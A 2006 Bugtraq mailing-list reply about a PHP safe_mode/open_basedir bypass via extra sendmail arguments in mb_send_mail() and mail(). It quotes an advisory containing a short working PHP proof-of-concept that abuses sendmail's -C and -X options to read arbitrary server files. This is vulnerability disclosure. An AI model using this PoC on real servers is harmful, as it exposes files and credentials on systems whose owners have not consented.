Bugtraq mailing list archives
Re: (PHP) mb_send_mail security bypass
From: Yasuo Ohgaki <yohgaki () ohgaki net>
Date: Thu, 02 Mar 2006 00:14:52 +0900
You should check mail() also... mail() has exactly the same issue, since both mail() and mb_send_mail() applies php_escape_shell_cmd() to 5th parameter. Since the PoC is feeding usual options to sendmail command, php_escape_shell_cmd() is useless for this kind of code. Solution: DO NOT TRUST safe_mode and open_basedir, since they are *FAIL* safe features for script bugs. Safe_mode and open_basedir are not for the protection against PHP code writers. By the way, php_escape_shell_cmd() is not applied to force_extra_parameter php.ini setting. (force_extra_paremeter is INI_PERDIR|INI_SYSTEM setting) Attackers can do much more with this feature if one would like to. -- Yasuo Ohgaki ced.clerget () free fr wrote:
Vulnerable: PHP4, PHP5 with use of sendmail 8.13.4 >< When safemode disabled and open_basedir restriction in effect, we can pass extra parameters to sendmail command in mail function, especially the -C and -X arguments. -C for alternate configuration file -X to log all in a file Can be used to view files, pass the file to view to C argument and store content in file passed to X argument. When safemode enabled and open_basedir restriction in effect, we can pass extra parameters to sendmail command in mb_send_mail function. Solution: Use other sendmail command and don't allow extra parameters for mb_send_mail when safemode enabled <?php if (isset($_REQUEST['file'])) { $file = "sendlog"; if (file_exists($file)) unlink($file); $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file; mb_send_mail(NULL, NULL, NULL, NULL, $extra); echo "<pre>".file_get_contents($file)."</pre>"; } ?>
Current thread:
- Re: (PHP) mb_send_mail security bypass Yasuo Ohgaki (Mar 01)